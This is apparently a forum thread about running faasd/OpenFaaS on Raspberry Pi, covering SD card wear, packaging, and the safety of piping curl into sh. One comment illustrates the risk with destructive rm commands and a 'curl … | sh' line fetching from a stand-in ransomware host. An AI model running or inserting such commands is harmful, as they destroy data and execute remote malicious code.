Read the introduction and conclusion for usecases. Self-hosted FaaS gives a "serverless" hands-off experience, whilst making packaging and operating flask, Go, Node, Express, CSharp, etc, etc trivial. Try it, see what you think.
You don't have to keep it running in memory all the time.
If you have a small device with limited resources, maybe you'd rather have it be ready to potentially do many different things for you infrequently, as opposed to doing fewer things continuously all the time.
It was my understanding that the kernel would put idle process to sleep, and even put the memory it uses from ram to disk and wake it up if there is some input to it.
Ok, that's a fair point. So maybe some serverless tech can be more specialised and thus better than the Linux kernel at managing, effectively, virtual memory.
If everything is written in-house I still think any API would be simpler but I guess this way some functions can be supplied by vendors/open-source which currently cannot be composed into an e.g. flask API. So it would be nice to have a way of composing APIs from simple functions supplied in packages for this use. I guess that is what serverless is.
In case you aren't aware, there are plenty of tutorials out there that help you get a raspberry pi to boot from USB, which allows you to use any HD there is.
Moreover, nothing stops you from getting everything to run on a RAM drive. There are raspberry pis with 8GB of RAM on the market right now.
Having said that, an official raspberry pi SD card with 16GB is sold for 10$. Not exactly something that pushes you to bankruptcy.
> it will be faulty way sooner because lots of I/O
It all makes sense now. One of my first computing projects was making a small cluster computer with raspberry PI boards. I noticed that the SD cards started to fail oddly fast. Most likely since they were all either swam nodes, or a swarm controller.
The difference might be (besides card quality) the amount of free space on the card. If you are churning through the same 500MB with your temporary files you will wear the card off much faster compared to spreading the same IO over 5GB of empty space.
I had a Pi which was very unstable. Measured the USB cable, supposedly a charging cable, and it had 1 Ohm resistance! Replaced it with a proper one and rock solid since.
Can you explain why this is so unacceptable? Couldn't you inspect the contents at the url before you executed the command? What I've seen in some cases is, run the curl command to download the file and then execute it. I don't see much difference. This is a serious question, not arguing that this is the best way.
The difference is between inspecting the executed command, and blindly executing something where you have no idea what it's going to do.
For example, maybe the URL contents is "rm --no-preserve-root -fr /". Or "rm -fr /home/*/Pictures 2>/dev/null". Or "curl https://ransomeware-encryptor.example.com | sh".
No problem if you inspect it first. Lots of unhappiness and heartbreak if you don't.
Has anyone ever in the history of complaining about this type of script run one and had it nuke their computer? What are the odds that the domains and companies and projects that use this have built their online presence just to pwn your computer for the lulz or that they have been compromised by a malicious actor without being detected at the same time you run the installer, and no one anywhere said anything?
How about if instead we exercise critical thinking and make our own assessment of the risk and act accordingly? Why would you choose not to pipe a shell script from a site you don’t trust but execute their installer instead?
If you don’t want to pipe it, download it and read it first.
But I don't pretend there's no security risk in doing so. Like you advised, I exercise critical thinking, and then I take a risk.
On someone else's production machine, or a container with sensitive data, that risk is too high. On a fun machine in isolation it's fine.
The GPP asks what's the security difference between inspecting and not inspecting the downloaded command.
> or that they have been compromised by a malicious actor without being detected at the same time you run the installer
Installers are compromised quite often by malicious actors. Running an installer is just as dubious as running "curl | sh".
However, replacing an installer with one that looks the same but is actually malicious, is a lot more work than replacing a blind script with one that looks the same but is actually malicious.
And the risk of a malicious blind script going unnoticed is higher than a compromised installer when the SHA256 is shown to be checked alongside the latter's link, simply because the attacker would need to change two places instead of one. Yes I do check hashes of installers when that's possible and there isn't a package manager already doing so. It's a good idea anyway in case of a corrupted download file, which I do see from time to time.
Pretty close. Some of them install all sorts of wacky dependencies through non-traditional means. Like you curl an install script and then it goes and curls a whole bunch of other stuff.
Massive PITA to track all the changes that it made and uninstall it.
Package managers were made for a reason, and people should use them.
Since the shell script in question installs OpenFAAS, unless you read all the source code for OpenFAAS too, then really you still have no idea if it's going to do something malicious or not.
A reasonable attacker would provide different file to curl and to the browser so you inspect something else then you run and don't even have a copy of the file.
Yes, a .deb package. Much easier to UNinstall. That's the biggest problem with these install scripts, they give a crap across your entire system and it's not obvious how to get rid of it if you decide you don't want it.
Actually, deb is way how to "distribute" software not to "just" install something. Let's say I would like to install Docker I will need to type following commands in case of Ubuntu:
How would `.deb` help you to install/uninstall such software? Do mind mean embedding some scripts to add third-party repository and then install your app?
Even then, what it actually changes from the script I have already suggested in previous post? It is still about downloading two files (signature and packaged application) and install it (e.g. via dpkg --install).
PPA's are just Ubuntu's way to make creating APT repositories easier. Those steps above are the longer way of achieving the same result without relying on Canonical's infrastructure. The same instructions can also be used with minor changes to also work on Debian and Raspbian (and could probably work on most other Debian-based distros).
Those steps above are covering all the bases for Debian-based distros, adding the signing keys Docker uses for their packages, and then finally inst
Erm, no. I think I haven't been clear in my first post. I am not asking about "how to install apt package", but how to provide a universal recipe to provide 3rd-party software as handy installation script. What you suggest is how to download and install few debs from a website. When I writing such script, I don't trust the host name "just like that" as you suggest. It can be malformed or point totally to different host that we would expect.
Of course they are but they are meant for more sophisticated purposes, (i.e. install, update, reinstall, remove app or even purge program with user data, etc.) and all of that logic is usually covered with signature checking with other security-oriented algorithms. I agree, I find apt/dnf/pacman/apk/xbps are great, but...
In case of Ubuntu, in order to install some deb-based software you usually have to bring your own script (this is what I call "copy & paste installation script") to add third-party repository that contains given package.
Yes.. working on that one, they don't have e2e testing equipment and don't have a personal interest in it so default to not doing anything about it. In the meantime armhf and arm64 are available here, along with custom build instructions - https://github.com/alexellis/containerd-arm
This should be flagged as 2019 in the title. OpenFaaS has progressed further (IIRC there are Docker Compose files for single-node deployments out there).
For those who are commenting without reading the post ( I know who you are :) )
> The use-cases for Serverless / FaaS are fairly well-known, but you could use faasd at the edge, in a smart-car, as part of an IoT device, for crunching data before uploading samples to the cloud, for webhook receivers/alerting, bots, webservices, API integrations or even providing your own APIs. Compute is compute, and OpenFaaS with containerd makes it easy to both consume and provide.
See also potential use-cases
Bear in mind that faasd is also used in production where users don't want to maintain a Kubernetes cluster, but do want a few APIs, websites, or functions.